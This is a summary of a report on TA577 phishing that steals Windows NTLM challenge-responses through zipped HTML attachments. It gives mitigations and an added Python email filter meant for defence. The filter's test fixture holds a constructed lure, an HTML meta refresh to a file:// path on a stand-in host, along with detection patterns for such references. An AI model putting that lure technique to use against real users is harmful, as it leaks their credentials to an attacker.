Hackers steal Windows NTLM authentication hashes in phishing attacks

March 4, 2024 at 04:46PM

The TA577 hacking group has shifted to phishing emails that steal NTLM authentication material for account hijacking. Its campaigns target employees with ZIP attachments, each archive unique to the message, that contain HTML files; when the HTML is opened, Windows automatically makes an outbound SMB connection to an attacker-controlled server, and the NTLMv2 challenge-response sent during that connection is captured. Proofpoint advises specific countermeasures, including blocking outbound SMB connections at the firewall and filtering email for zipped HTML attachments.

Key takeaways from the report:

1. TA577 has shifted tactics to using phishing emails to steal NT LAN Manager (NTLM) authentication hashes for account hijacks.

2. These attacks target Windows devices. The malicious HTML file inside the ZIP attachment, once opened, makes Windows connect to an external, attacker-controlled server over SMB; Windows then attempts NTLM authentication to that server without any user interaction, and the attacker's server records the NTLMv2 challenge-response (commonly called a Net-NTLMv2 hash) together with the username and domain.

3. What is captured is not the NT hash itself but a challenge-response value. It can be cracked offline to recover the user's password, or relayed to services that do not enforce signing or channel binding; either path lets an attacker hijack accounts, access sensitive information, evade security products and move laterally within the breached network. A true "pass-the-hash" attack replays the NT hash directly and is not possible from this capture alone; the pass-the-hash wording in the original report overstates what the attacker holds.

4. Multi-factor authentication should be enabled wherever a recovered password could be reused (VPN, webmail, cloud portals), but NTLM itself carries no second factor: relaying the captured response, or using a cracked password against services that still speak NTLM, is not stopped by MFA. MFA limits the blast radius rather than preventing the technique.

5. Protective measures include configuring perimeter firewalls to block outbound SMB (TCP 445) to the internet, filtering email to block messages carrying zipped HTML files, and using the Windows group policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" (run it in "Audit all" first, then move to "Deny all") so that clients stop sending NTLM credentials to external hosts.

6. Organizations on newer Windows 11 builds have an additional control: the SMB client can be told to refuse NTLM for outbound connections (the SMB client NTLM-blocking setting under the Lanman Workstation group policy, or Set-SmbClientConfiguration -BlockNTLM $true), which stops the client from falling back to NTLM even when a remote SMB server requests it.

These takeaways provide a clear understanding of the current tactics employed by TA577 and the corresponding protective measures that organizations can consider implementing.
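
The email-filtering measure in takeaway 5, as an added example (not Proofpoint's or any mail vendor's code): a gateway-style check that blocks ZIP attachments carrying HTML and, as a second signal, looks inside that HTML for references that would make Windows open an outbound SMB connection. The lure archive below is constructed for the example and modelled on the generic HTML-to-SMB technique (a meta refresh to a file:// URL on an external host, using an RFC 5737 test address); it is not a sample from the campaign.

```python
import io
import re
import zipfile

HTML_EXT = (".html", ".htm", ".shtml", ".xhtml")
# file://host/... or \\host\share: either makes the SMB client reach out to "host".
UNC_OR_FILE = re.compile(rb"(?:file://|\\\\)[0-9a-z.\-]+[\\/]", re.I)
META_REFRESH = re.compile(rb"http-equiv\s*=\s*['\"]?refresh", re.I)
MAX_INSPECT = 512 * 1024  # cap the read so an oversized entry cannot exhaust the filter


def scan_zip_attachment(data: bytes) -> dict:
    """Verdict for one ZIP attachment: {"block": bool, "reasons": [...]}.

    Policy: any HTML entry is enough to block (the report's recommendation);
    the content checks only add explanation for the analyst. Encrypted
    entries cannot be inspected and are blocked on extension alone.
    """
    reasons = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"block": False, "reasons": ["not a zip archive"]}
    with zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(HTML_EXT):
                continue
            reasons.append(f"zipped HTML entry: {info.filename}")
            if info.flag_bits & 0x1:  # encrypted; cannot read without the password
                reasons.append(f"{info.filename} is encrypted, content not inspected")
                continue
            with zf.open(info) as fh:
                body = fh.read(MAX_INSPECT)
            if UNC_OR_FILE.search(body):
                reasons.append(f"{info.filename} references a file:// or UNC path")
            if META_REFRESH.search(body):
                reasons.append(f"{info.filename} uses a meta refresh")
    return {"block": bool(reasons), "reasons": reasons}


def _build_zip(entries: dict) -> bytes:
    """Helper for the constructed samples: build an in-memory ZIP from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in entries.items():
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed samples (not real campaign artefacts).
LURE_ZIP = _build_zip({
    "Invoice_4471.html": b'<html><head><meta http-equiv="refresh" '
                         b'content="0; url=file://192.0.2.10/share/invoice.txt"></head></html>'
})
BENIGN_ZIP = _build_zip({"notes.txt": b"quarterly numbers attached separately"})


if __name__ == "__main__":
    for label, blob in (("lure", LURE_ZIP), ("benign", BENIGN_ZIP)):
        print(label, scan_zip_attachment(blob))
```

The check deliberately blocks on the presence of HTML alone, matching the report's advice; the path and meta-refresh signals are there to give responders a reason string, not to decide the verdict. It does not recurse into nested archives, so a production filter should apply the same function to ZIP entries found inside a ZIP.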
